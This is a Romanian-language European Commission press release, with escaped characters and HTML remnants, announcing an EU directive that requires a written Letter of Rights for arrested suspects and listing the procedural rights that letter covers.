\n\tAceast\u0103 m\u0103sur\u0103 va garanta c\u0103 statele membre ale UE vor transmite tuturor persoanelor arestate – sau care fac obiectul unui mandat european de arestare<\/a> – o Not\u0103 privind drepturile<\/em>, \u00een care sunt enumerate toate drepturile lor fundamentale \u00een cursul procedurilor penale. Dup\u0103 ce va intra \u00een vigoare (la doi ani dup\u0103 publicarea \u00een Jurnalul Oficial al Uniunii Europene, care se preconizeaz\u0103 c\u0103 va avea loc \u00een c\u00e2teva s\u0103pt\u0103m\u00e2ni), noul act legislativ se va aplica \u00een aproximativ 8 milioane de proceduri penale \u00een fiecare an, \u00een toate cele 27 de state membre ale UE. Acest drept exist\u0103 \u00een prezent numai \u00eentr-o treime din statele membre.<\/p>\n

\n\t„Dreptul<\/em> la un proces echitabil este unul dintre pilonii centrali ai sistemelor noastre judiciare din <\/em>Europa<\/em>”, a declarat Viviane Reding, vicepre\u0219edinte al Comisiei \u0219i comisar UE pentru justi\u021bie. „Acest<\/em> nou act legislativ al UE va contribui la garantarea acestui drept, asigur\u00e2nd informarea clar\u0103 \u0219i prompt\u0103 a tuturor persoanelor cu privire la drepturile de care beneficiaz\u0103. Ast\u0103zi marc\u0103m o etap\u0103 important\u0103 \u00een eforturile noastre comune de a le garanta cet\u0103\u021benilor europeni accesul la justi\u021bie, oriunde s-ar afla pe teritoriul UE. Doresc s\u0103 mul\u021bumesc Parlamentului European \u0219i mini\u0219trilor de justi\u021bie din UE pentru sprijinul acordat propunerii Comisiei. Faptul c\u0103 acest drept la un proces echitabil a fost transformat \u00een realitate, \u00eentr-un timp at\u00e2t de scurt, pentru cele 500 de milioane de cet\u0103\u021beni ai Europei creeaz\u0103 un precedent pozitiv pentru o Europ\u0103 a drepturilor \u0219i a <\/em>justi\u021biei.<\/em>”<\/p>\n

\n\tContext<\/strong><\/p>\n

\n\tComisia European\u0103 a propus noul act legislativ \u00een iulie 2010 (IP\/10\/989<\/a>), ca parte dintr-o serie de m\u0103suri av\u00e2nd ca scop garantarea dreptului la un proces echitabil pe tot cuprinsul UE. Aceasta este a doua m\u0103sur\u0103, adoptat\u0103 la ini\u021biativa dnei Reding, comisarul UE pentru justi\u021bie, menit\u0103 s\u0103 instituie standarde minime comune la nivelul UE \u00een materie penal\u0103. Acest lucru va spori \u00eencrederea \u00een spa\u021biul de justi\u021bie al UE. \u00cen octombrie 2010, Parlamentul European \u0219i Consiliul au aprobat prima propunere, prin care s-a conferit persoanelor suspectate dreptul la traducere \u0219i interpretare (IP\/10\/1305<\/a>).<\/p>\n

\n\t\u00a0<\/p>\n

\n\t\u00a0<\/p>\n

\n\tDirectiva va garanta c\u0103 poli\u021bia \u0219i procurorii ofer\u0103 persoanelor suspectate informa\u021bii cu privire la drepturile de care beneficiaz\u0103. \u00cen urma unei arest\u0103ri, aceste informa\u021bii vor fi furnizate \u00een scris de c\u0103tre autorit\u0103\u021bi, sub forma unei Note privind drepturile<\/strong>, elaborat\u0103 \u00eentr-un limbaj simplu, uzual. \u00cen momentul arest\u0103rii, aceast\u0103 not\u0103 va fi pus\u0103 sistematic la dispozi\u021bia persoanei suspectate de comiterea unei infrac\u021biuni, indiferent dac\u0103 aceasta o solicit\u0103 sau nu, \u0219i va fi tradus\u0103, dac\u0103 este necesar. \u021a\u0103rile UE sunt libere s\u0103 aleag\u0103 formularea exact\u0103 a notei; Comisia a propus un model \u00een 22 de limbi ale UE (a se vedea anexa). Se va oferi astfel o garan\u021bie de coeren\u021b\u0103 persoanelor care traverseaz\u0103 frontierele \u0219i se vor limita costurile de traducere.<\/p>\n

\n\tNota privind drepturile va con\u021bine detaliile practice referitoare la drepturile persoanelor arestate sau re\u021binute, precum dreptul:<\/p>\n

\n\t–\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 de a p\u0103stra t\u0103cerea;<\/p>\n

\n\t–\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 de a beneficia de asisten\u021b\u0103 din partea unui avocat;<\/p>\n

\n\t–\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 de a fi informate cu privire la capetele acuz\u0103rii;<\/p>\n

\n\t–\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 la interpretare \u0219i traducere \u00een orice limb\u0103 pentru persoanele care nu \u00een\u021beleg limba \u00een care se desf\u0103\u0219oar\u0103 procedura;<\/p>\n

\n\t–\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 de a fi aduse cu promptitudine \u00een fa\u021ba unei instan\u021be dup\u0103 arestare;<\/p>\n

\n\t–\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 de a informa o alt\u0103 persoan\u0103 \u00een leg\u0103tur\u0103 cu arestarea sau re\u021binerea.<\/p>\n

\n\tNota privind drepturile va contribui la evitarea erorilor judiciare<\/strong> \u0219i la reducerea num\u0103rului de c\u0103i de atac introduse.<\/p>\n

\n\t\u00cen prezent, gradul de informare a cet\u0103\u021benilor cu privire la drepturile lor, \u00een eventualitatea \u00een care sunt aresta\u021bi \u0219i \u00eenvinui\u021bi de comiterea unei infrac\u021biuni, variaz\u0103 pe teritoriul UE<\/strong>. \u00cen unele state membre, persoanele suspectate sunt informate doar pe cale verbal\u0103 cu privire la drepturile lor procedurale, iar \u00een alte state membre se ofer\u0103 informa\u021bii scrise doar la cerere.<\/p>\n

\n\t\u00cen temeiul articolului 82 alineatul (2) din Tratatul privind func\u021bionarea Uniunii Europene<\/a>, \u00een scopul de a facilita recunoa\u0219terea reciproc\u0103 a deciziilor judiciare \u0219i de a \u00eembun\u0103t\u0103\u021bi cooperarea poli\u021bieneasc\u0103 \u0219i judiciar\u0103 \u00een materie penal\u0103, UE poate adopta m\u0103suri pentru a consolida drepturile cet\u0103\u021benilor UE, \u00een conformitate cu Carta drepturilor fundamentale a UE.<\/p>\n

\n\tDreptul la un proces echitabil \u0219i dreptul la ap\u0103rare sunt consacrate la articolele\u00a047\u00a0\u0219i\u00a048\u00a0din Carta drepturilor fundamentale a Uniunii Europene, precum \u0219i la articolul\u00a06 din Conven\u021bia european\u0103 a drepturilor omului.<\/p>\n

\n\t\u00cen iunie 2011, Comisia a propus o a treia m\u0103sur\u0103 de garantare a accesului la un avocat \u0219i a dreptului de a comunica cu rudele (IP\/11\/689<\/a>). \u00cen prezent, propunerea este dezb\u0103tut\u0103 \u00een cadrul Parlamentului European \u0219i al Consiliului.<\/p>\n
